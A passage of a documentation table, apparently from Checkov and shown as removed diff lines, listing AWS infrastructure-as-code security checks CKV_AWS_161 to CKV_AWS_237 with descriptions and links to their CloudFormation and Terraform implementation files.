-| 529 | CKV_AWS_161 | resource | AWS::RDS::DBInstance | Ensure RDS database has IAM authentication enabled | Cloudformation | [RDSIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSIAMAuthentication.py) |
-| 530 | CKV_AWS_161 | resource | aws_db_instance | Ensure RDS database has IAM authentication enabled | Terraform | [RDSIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSIAMAuthentication.py) |
-| 531 | CKV_AWS_162 | resource | AWS::RDS::DBCluster | Ensure RDS cluster has IAM authentication enabled | Cloudformation | [RDSClusterIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSClusterIAMAuthentication.py) |
-| 532 | CKV_AWS_162 | resource | aws_rds_cluster | Ensure RDS cluster has IAM authentication enabled | Terraform | 
[RDSClusterIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterIAMAuthentication.py) |
-| 533 | CKV_AWS_163 | resource | AWS::ECR::Repository | Ensure ECR image scanning on push is enabled | Cloudformation | [ECRImageScanning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRImageScanning.py) |
-| 534 | CKV_AWS_163 | resource | aws_ecr_repository | Ensure ECR image scanning on push is enabled | Terraform | [ECRImageScanning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRImageScanning.py) |
-| 535 | CKV_AWS_164 | resource | AWS::Transfer::Server | Ensure Transfer Server is not exposed publicly. | Cloudformation | [TransferServerIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/TransferServerIsPublic.py) |
-| 536 | CKV_AWS_164 | resource | aws_transfer_server | Ensure Transfer Server is not exposed publicly. 
| Terraform | [TransferServerIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TransferServerIsPublic.py) |
-| 537 | CKV_AWS_165 | resource | AWS::DynamoDB::GlobalTable | Ensure DynamoDB global table point in time recovery (backup) is enabled | Cloudformation | [DynamodbGlobalTableRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DynamodbGlobalTableRecovery.py) |
-| 538 | CKV_AWS_165 | resource | aws_dynamodb_global_table | Ensure DynamoDB point in time recovery (backup) is enabled for global tables | Terraform | [DynamoDBGlobalTableRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBGlobalTableRecovery.py) |
-| 539 | CKV_AWS_166 | resource | AWS::Backup::BackupVault | Ensure Backup Vault is encrypted at rest using KMS CMK | Cloudformation | [BackupVaultEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/BackupVaultEncrypted.py) |
-| 540 | CKV_AWS_166 | resource | aws_backup_vault | Ensure Backup Vault is encrypted at rest using KMS CMK | Terraform | [BackupVaultEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/BackupVaultEncrypted.py) |
-| 541 | CKV_AWS_167 | resource | aws_glacier_vault | Ensure Glacier Vault access policy is not public by only allowing specific services or principals to access it | Terraform | [GlacierVaultAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlacierVaultAnyPrincipal.py) |
-| 542 | CKV_AWS_168 | resource | aws_sqs_queue | Ensure SQS queue policy is not public by only allowing specific services or principals to access it | Terraform | [SQSQueuePolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueuePolicyAnyPrincipal.py) |
-| 543 | CKV_AWS_168 | 
resource | aws_sqs_queue_policy | Ensure SQS queue policy is not public by only allowing specific services or principals to access it | Terraform | [SQSQueuePolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueuePolicyAnyPrincipal.py) |
-| 544 | CKV_AWS_169 | resource | aws_sns_topic_policy | Ensure SNS topic policy is not public by only allowing specific services or principals to access it | Terraform | [SNSTopicPolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SNSTopicPolicyAnyPrincipal.py) |
-| 545 | CKV_AWS_170 | resource | AWS::QLDB::Ledger | Ensure QLDB ledger permissions mode is set to STANDARD | Cloudformation | [QLDBLedgerPermissionsMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/QLDBLedgerPermissionsMode.py) |
-| 546 | CKV_AWS_170 | resource | aws_qldb_ledger | Ensure QLDB ledger permissions mode is set to STANDARD | Terraform | [QLDBLedgerPermissionsMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/QLDBLedgerPermissionsMode.py) |
-| 547 | CKV_AWS_171 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encryption is using SSE-KMS | Terraform | [EMRClusterIsEncryptedKMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterIsEncryptedKMS.py) |
-| 548 | CKV_AWS_172 | resource | AWS::QLDB::Ledger | Ensure QLDB ledger has deletion protection enabled | Cloudformation | [QLDBLedgerDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/QLDBLedgerDeletionProtection.py) |
-| 549 | CKV_AWS_172 | resource | aws_qldb_ledger | Ensure QLDB ledger has deletion protection enabled | Terraform | 
[QLDBLedgerDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/QLDBLedgerDeletionProtection.py) | -| 550 | CKV_AWS_173 | resource | AWS::Lambda::Function | Check encryption settings for Lambda environment variable | Cloudformation | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py) | -| 551 | CKV_AWS_173 | resource | AWS::Serverless::Function | Check encryption settings for Lambda environment variable | Cloudformation | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py) | -| 552 | CKV_AWS_173 | resource | aws_lambda_function | Check encryption settings for Lambda environmental variable | Terraform | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py) | -| 553 | CKV_AWS_174 | resource | AWS::CloudFront::Distribution | Verify CloudFront Distribution Viewer Certificate is using TLS v1.2 | Cloudformation | [CloudFrontTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudFrontTLS12.py) | -| 554 | CKV_AWS_174 | resource | aws_cloudfront_distribution | Verify CloudFront Distribution Viewer Certificate is using TLS v1.2 | Terraform | [CloudfrontTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontTLS12.py) | -| 555 | CKV_AWS_175 | resource | aws_waf_web_acl | Ensure WAF has associated rules | Terraform | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py) | -| 556 | CKV_AWS_175 | resource | aws_wafregional_web_acl | Ensure WAF has associated rules | Terraform | 
[WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py) | -| 557 | CKV_AWS_175 | resource | aws_wafv2_web_acl | Ensure WAF has associated rules | Terraform | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py) | -| 558 | CKV_AWS_176 | resource | aws_waf_web_acl | Ensure Logging is enabled for WAF Web Access Control Lists | Terraform | [WAFHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasLogs.py) | -| 559 | CKV_AWS_176 | resource | aws_wafregional_web_acl | Ensure Logging is enabled for WAF Web Access Control Lists | Terraform | [WAFHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasLogs.py) | -| 560 | CKV_AWS_177 | resource | aws_kinesis_video_stream | Ensure Kinesis Video Stream is encrypted by KMS using a customer managed Key (CMK) | Terraform | [KinesisVideoEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisVideoEncryptedWithCMK.py) | -| 561 | CKV_AWS_178 | resource | aws_fsx_ontap_file_system | Ensure fx ontap file system is encrypted by KMS using a customer managed Key (CMK) | Terraform | [FSXOntapFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXOntapFSEncryptedWithCMK.py) | -| 562 | CKV_AWS_179 | resource | aws_fsx_windows_file_system | Ensure FSX Windows filesystem is encrypted by KMS using a customer managed Key (CMK) | Terraform | [FSXWindowsFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXWindowsFSEncryptedWithCMK.py) | -| 563 | CKV_AWS_180 | resource | aws_imagebuilder_component | Ensure Image Builder component is encrypted by KMS using a customer managed Key (CMK) | Terraform | 
[ImagebuilderComponentEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderComponentEncryptedWithCMK.py) | -| 564 | CKV_AWS_181 | resource | aws_s3_object_copy | Ensure S3 Object Copy is encrypted by KMS using a customer managed Key (CMK) | Terraform | [S3ObjectCopyEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ObjectCopyEncryptedWithCMK.py) | -| 565 | CKV_AWS_182 | resource | aws_docdb_cluster | Ensure DocumentDB is encrypted by KMS using a customer managed Key (CMK) | Terraform | [DocDBEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBEncryptedWithCMK.py) | -| 566 | CKV_AWS_183 | resource | aws_ebs_snapshot_copy | Ensure EBS Snapshot Copy is encrypted by KMS using a customer managed Key (CMK) | Terraform | [EBSSnapshotCopyEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSSnapshotCopyEncryptedWithCMK.py) | -| 567 | CKV_AWS_184 | resource | aws_efs_file_system | Ensure resource is encrypted by KMS using a customer managed Key (CMK) | Terraform | [EFSFileSystemEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSFileSystemEncryptedWithCMK.py) | -| 568 | CKV_AWS_185 | resource | aws_kinesis_stream | Ensure Kinesis Stream is encrypted by KMS using a customer managed Key (CMK) | Terraform | [KinesisStreamEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisStreamEncryptedWithCMK.py) | -| 569 | CKV_AWS_186 | resource | aws_s3_bucket_object | Ensure S3 bucket Object is encrypted by KMS using a customer managed Key (CMK) | Terraform | [S3BucketObjectEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BucketObjectEncryptedWithCMK.py) | -| 570 
| CKV_AWS_187 | resource | aws_sagemaker_domain | Ensure Sagemaker domain is encrypted by KMS using a customer managed Key (CMK) | Terraform | [SagemakerDomainEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py) | -| 571 | CKV_AWS_189 | resource | aws_ebs_volume | Ensure EBS Volume is encrypted by KMS using a customer managed Key (CMK) | Terraform | [EBSVolumeEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSVolumeEncryptedWithCMK.py) | -| 572 | CKV_AWS_190 | resource | aws_fsx_lustre_file_system | Ensure lustre file systems is encrypted by KMS using a customer managed Key (CMK) | Terraform | [LustreFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LustreFSEncryptedWithCMK.py) | -| 573 | CKV_AWS_191 | resource | aws_elasticache_replication_group | Ensure ElastiCache replication group is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ElasticacheReplicationGroupEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptedWithCMK.py) | -| 574 | CKV_AWS_192 | resource | AWS::WAFv2::WebACL | Ensure WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Cloudformation | [WAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WAFACLCVE202144228.py) | -| 575 | CKV_AWS_192 | resource | aws_wafv2_web_acl | Ensure WAF prevents message lookup in Log4j2. 
See CVE-2021-44228 aka log4jshell | Terraform | [WAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFACLCVE202144228.py) | -| 576 | CKV_AWS_193 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync has Logging enabled | Cloudformation | [AppSyncLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncLogging.py) | -| 577 | CKV_AWS_193 | resource | aws_appsync_graphql_api | Ensure AppSync has Logging enabled | Terraform | [AppSyncLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppSyncLogging.py) | -| 578 | CKV_AWS_194 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync has Field-Level logs enabled | Cloudformation | [AppSyncFieldLevelLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncFieldLevelLogs.py) | -| 579 | CKV_AWS_194 | resource | aws_appsync_graphql_api | Ensure AppSync has Field-Level logs enabled | Terraform | [AppSyncFieldLevelLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppSyncFieldLevelLogs.py) | -| 580 | CKV_AWS_195 | resource | AWS::Glue::Crawler | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | -| 581 | CKV_AWS_195 | resource | AWS::Glue::DevEndpoint | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | -| 582 | CKV_AWS_195 | resource | AWS::Glue::Job | Ensure Glue component has a security configuration associated | Cloudformation | 
[GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | -| 583 | CKV_AWS_195 | resource | aws_glue_crawler | Ensure Glue component has a security configuration associated | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | -| 584 | CKV_AWS_195 | resource | aws_glue_dev_endpoint | Ensure Glue component has a security configuration associated | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | -| 585 | CKV_AWS_195 | resource | aws_glue_job | Ensure Glue component has a security configuration associated | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | -| 586 | CKV_AWS_196 | resource | aws_elasticache_security_group | Ensure no aws_elasticache_security_group resources exist | Terraform | [ElasticacheHasSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheHasSecurityGroup.py) | -| 587 | CKV_AWS_197 | resource | AWS::AmazonMQ::Broker | Ensure MQ Broker Audit logging is enabled | Cloudformation | [MQBrokerAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MQBrokerAuditLogging.py) | -| 588 | CKV_AWS_197 | resource | aws_mq_broker | Ensure MQ Broker Audit logging is enabled | Terraform | [MQBrokerAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerAuditLogging.py) | -| 589 | CKV_AWS_198 | resource | aws_db_security_group | Ensure no aws_db_security_group resources exist | Terraform | 
[RDSHasSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSHasSecurityGroup.py) | -| 590 | CKV_AWS_199 | resource | aws_imagebuilder_distribution_configuration | Ensure Image Builder Distribution Configuration encrypts AMI's using KMS - a customer managed Key (CMK) | Terraform | [ImagebuilderDistributionConfigurationEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderDistributionConfigurationEncryptedWithCMK.py) | -| 591 | CKV_AWS_200 | resource | aws_imagebuilder_image_recipe | Ensure that Image Recipe EBS Disk are encrypted with CMK | Terraform | [ImagebuilderImageRecipeEBSEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderImageRecipeEBSEncrypted.py) | -| 592 | CKV_AWS_201 | resource | aws_memorydb_cluster | Ensure MemoryDB is encrypted at rest using KMS CMKs | Terraform | [MemoryDBEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBEncryptionWithCMK.py) | -| 593 | CKV_AWS_202 | resource | aws_memorydb_cluster | Ensure MemoryDB data is encrypted in transit | Terraform | [MemoryDBClusterIntransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBClusterIntransitEncryption.py) | -| 594 | CKV_AWS_203 | resource | aws_fsx_openzfs_file_system | Ensure resource is encrypted by KMS using a customer managed Key (CMK) | Terraform | [FSXOpenZFSFileSystemEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXOpenZFSFileSystemEncryptedWithCMK.py) | -| 595 | CKV_AWS_204 | resource | aws_ami | Ensure AMIs are encrypted using KMS CMKs | Terraform | [AMIEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMIEncryption.py) | -| 596 | CKV_AWS_205 | resource | 
aws_ami_launch_permission | Ensure to Limit AMI launch Permissions | Terraform | [AMILaunchIsShared.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMILaunchIsShared.py) | -| 597 | CKV_AWS_206 | resource | aws_api_gateway_domain_name | Ensure API Gateway Domain uses a modern security Policy | Terraform | [APIGatewayDomainNameTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayDomainNameTLS.py) | -| 598 | CKV_AWS_207 | resource | aws_mq_broker | Ensure MQ Broker minor version updates are enabled | Terraform | [MQBrokerMinorAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerMinorAutoUpgrade.py) | -| 599 | CKV_AWS_208 | resource | aws_mq_broker | Ensure MQ Broker version is current | Terraform | [MQBrokerVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerVersion.py) | -| 600 | CKV_AWS_208 | resource | aws_mq_configuration | Ensure MQ Broker version is current | Terraform | [MQBrokerVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerVersion.py) | -| 601 | CKV_AWS_209 | resource | aws_mq_broker | Ensure MQ broker encrypted by KMS using a customer managed Key (CMK) | Terraform | [MQBrokerEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerEncryptedWithCMK.py) | -| 602 | CKV_AWS_210 | resource | aws_batch_job_definition | Batch job does not define a privileged container | Terraform | [BatchJobIsNotPrivileged.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/BatchJobIsNotPrivileged.py) | -| 603 | CKV_AWS_211 | resource | aws_db_instance | Ensure RDS uses a modern CaCert | Terraform | 
[RDSCACertIsRecent.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSCACertIsRecent.py) | -| 604 | CKV_AWS_212 | resource | aws_dms_replication_instance | Ensure DMS replication instance is encrypted by KMS using a customer managed Key (CMK) | Terraform | [DMSReplicationInstanceEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstanceEncryptedWithCMK.py) | -| 605 | CKV_AWS_213 | resource | aws_load_balancer_policy | Ensure ELB Policy uses only secure protocols | Terraform | [ELBPolicyUsesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBPolicyUsesSecureProtocols.py) | -| 606 | CKV_AWS_214 | resource | aws_appsync_api_cache | Ensure AppSync API Cache is encrypted at rest | Terraform | [AppsyncAPICacheEncryptionAtRest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppsyncAPICacheEncryptionAtRest.py) | -| 607 | CKV_AWS_215 | resource | aws_appsync_api_cache | Ensure AppSync API Cache is encrypted in transit | Terraform | [AppsyncAPICacheEncryptionInTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppsyncAPICacheEncryptionInTransit.py) | -| 608 | CKV_AWS_216 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution is enabled | Terraform | [CloudfrontDistributionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionEnabled.py) | -| 609 | CKV_AWS_217 | resource | aws_api_gateway_deployment | Ensure Create before destroy for API deployments | Terraform | [APIGatewayDeploymentCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayDeploymentCreateBeforeDestroy.py) | -| 610 | CKV_AWS_218 | resource | aws_cloudsearch_domain | Ensure that CloudSearch is 
using latest TLS | Terraform | [CloudsearchDomainTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudsearchDomainTLS.py) | -| 611 | CKV_AWS_219 | resource | aws_codepipeline | Ensure CodePipeline Artifact store is using a KMS CMK | Terraform | [CodePipelineArtifactsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodePipelineArtifactsEncrypted.py) | -| 612 | CKV_AWS_220 | resource | aws_cloudsearch_domain | Ensure that CloudSearch is using https | Terraform | [CloudsearchDomainEnforceHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudsearchDomainEnforceHttps.py) | -| 613 | CKV_AWS_221 | resource | aws_codeartifact_domain | Ensure CodeArtifact Domain is encrypted by KMS using a customer managed Key (CMK) | Terraform | [CodeArtifactDomainEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeArtifactDomainEncryptedWithCMK.py) | -| 614 | CKV_AWS_222 | resource | aws_dms_replication_instance | Ensure DMS replication instance gets all minor upgrade automatically | Terraform | [DMSReplicationInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstanceMinorUpgrade.py) | -| 615 | CKV_AWS_223 | resource | aws_ecs_cluster | Ensure ECS Cluster enables logging of ECS Exec | Terraform | [ECSClusterLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterLoggingEnabled.py) | -| 616 | CKV_AWS_224 | resource | aws_ecs_cluster | Ensure ECS Cluster logging uses CMK | Terraform | [ECSClusterLoggingEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterLoggingEncryptedWithCMK.py) | -| 617 | CKV_AWS_225 | resource | aws_api_gateway_method_settings | Ensure API Gateway method setting 
caching is enabled | Terraform | [APIGatewayMethodSettingsCacheEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEnabled.py) | -| 618 | CKV_AWS_226 | resource | aws_db_instance | Ensure DB instance gets all minor upgrades automatically | Terraform | [DBInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceMinorUpgrade.py) | -| 619 | CKV_AWS_226 | resource | aws_rds_cluster_instance | Ensure DB instance gets all minor upgrades automatically | Terraform | [DBInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceMinorUpgrade.py) | -| 620 | CKV_AWS_227 | resource | aws_kms_key | Ensure KMS key is enabled | Terraform | [KMSKeyIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSKeyIsEnabled.py) | -| 621 | CKV_AWS_228 | resource | aws_elasticsearch_domain | Verify Elasticsearch domain is using an up to date TLS policy | Terraform | [ElasticsearchTLSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchTLSPolicy.py) | -| 622 | CKV_AWS_228 | resource | aws_opensearch_domain | Verify Elasticsearch domain is using an up to date TLS policy | Terraform | [ElasticsearchTLSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchTLSPolicy.py) | -| 623 | CKV_AWS_229 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 21 | Terraform | [NetworkACLUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress21.py) | -| 624 | CKV_AWS_229 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 21 | Terraform | 
[NetworkACLUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress21.py) | -| 625 | CKV_AWS_230 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 20 | Terraform | [NetworkACLUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress20.py) | -| 626 | CKV_AWS_230 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 20 | Terraform | [NetworkACLUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress20.py) | -| 627 | CKV_AWS_231 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [NetworkACLUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress3389.py) | -| 628 | CKV_AWS_231 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [NetworkACLUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress3389.py) | -| 629 | CKV_AWS_232 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 22 | Terraform | [NetworkACLUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress22.py) | -| 630 | CKV_AWS_232 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 22 | Terraform | [NetworkACLUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress22.py) | -| 631 | CKV_AWS_233 | resource | aws_acm_certificate | Ensure Create before destroy for ACM certificates 
| Terraform | [ACMCertCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ACMCertCreateBeforeDestroy.py) | -| 632 | CKV_AWS_234 | resource | aws_acm_certificate | Verify logging preference for ACM certificates | Terraform | [ACMCertSetLoggingPreference.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ACMCertSetLoggingPreference.py) | -| 633 | CKV_AWS_235 | resource | aws_ami_copy | Ensure that copied AMIs are encrypted | Terraform | [AMICopyIsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMICopyIsEncrypted.py) | -| 634 | CKV_AWS_236 | resource | aws_ami_copy | Ensure AMI copying uses a CMK | Terraform | [AMICopyUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMICopyUsesCMK.py) | -| 635 | CKV_AWS_237 | resource | aws_api_gateway_rest_api | Ensure Create before destroy for API Gateway | Terraform | [APIGatewayCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayCreateBeforeDestroy.py) | -| 